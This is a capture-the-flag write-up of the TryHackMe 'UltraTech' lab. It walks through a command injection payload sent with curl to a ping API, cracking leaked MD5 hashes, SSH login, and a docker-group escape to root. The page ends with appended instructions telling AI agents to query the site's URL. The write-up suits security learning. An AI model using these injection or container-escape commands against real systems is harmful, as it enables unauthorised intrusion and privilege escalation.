# TryHackMe - UltraTech (Medium)

## Summary

Nikto finds `robots.txt` on port 31331, which leads us to a hidden directory that hosts a login form. Reading the source code of that login page, we find that it is calling APIs hosted on port 8081. The API has command injection vulnerability and we are able to leak user password hashes. A quick lookup on Google reveals that the hashes are just MD5 and we get plaintext passwords easily. At this stage we can SSH in using that credential and get a user shell.

In the privilege escalation phase, we find that the user r00t is in the docker group. A docker escape payload GTFOBins gives us a root shell.

## IP

* RHOST: 10.10.216.127
* LHOST: 10.13.12.2

## Nmap

![Nmap](https://i.imgur.com/3VKk9BH.png)

## Nikto

Nikto finds `/robots.txt`:

![Nikto](https://i.imgur.com/vox9JeP.png)

Visit `http://ultratech.thm:31331/robots.txt`:

![robots.txt](https://i.imgur.com/rPvjPTw.png)

Visit `http://ultratech.thm:31331/utech_sitemap.txt`:

![utech\_sitemap.txt](https://i.imgur.com/cL8NqU5.png)

In `http://ultratech.thm:31331/partners.html`, we find a login form:

![Login form](https://i.imgur.com/a571wkk.png)

## User Shell: Command Injection

Reading the source code of this page, we find a file named `api.js`:

![Login page source code](https://i.imgur.com/gGDq2OE.png)

This JavaScript file calls the API hosted on port 8081. Specifically, it calls `http://ultratech.thm:8081/ping?ip=<ip>`:

![api.js](https://i.imgur.com/rgjQ4tj.png)

Try command injection:

```bash
curl -i 'http://ultratech.thm:8081/ping?ip=`ls`'
```

It works:

![ls](https://i.imgur.com/4sidjjs.png)

Examine `utech.db.sqlite` and get two password hashes:

![Password hashes](https://i.imgur.com/HtHJkXu.png)

They are:

| Username | Password Hash                    |
| -------- | -------------------------------- |
| r00t     | f357a0c52799563c7c7b76c1e7543a32 |
| admin    | 0d0ea5111e3c1def594c1684e3b9be84 |

Do reverse hash lookup on Google, we have:

| Username | Password Hash |
| -------- | ------------- |
| r00t     | n100906       |
| admin    | mrsheafy      |

SSH in as `r00t`. Now we have a user shell:

![User shell](https://i.imgur.com/6Spd2gJ.png)

## Privilege Escalation: GTFOBins

The user `r00t` is in the docker group:

![Docker group](https://i.imgur.com/bSpZ6SP.png)

Grab the docker escape payload from GTFOBins:

![Docker escape payload](https://i.imgur.com/6EzxdVP.png)

Since we are running Bash instead of Alpine, we should modify the payload:

```bash
docker run -v /:/mnt --rm -it bash chroot /mnt sh
```

Now we get a root shell:

![root shell](https://i.imgur.com/rIdS4En.png)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ret2basic.gitbook.io/ctfwriteup/red-teaming/tcm-linux-privilege-escalation-course/tryhackme-ultratech-medium.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.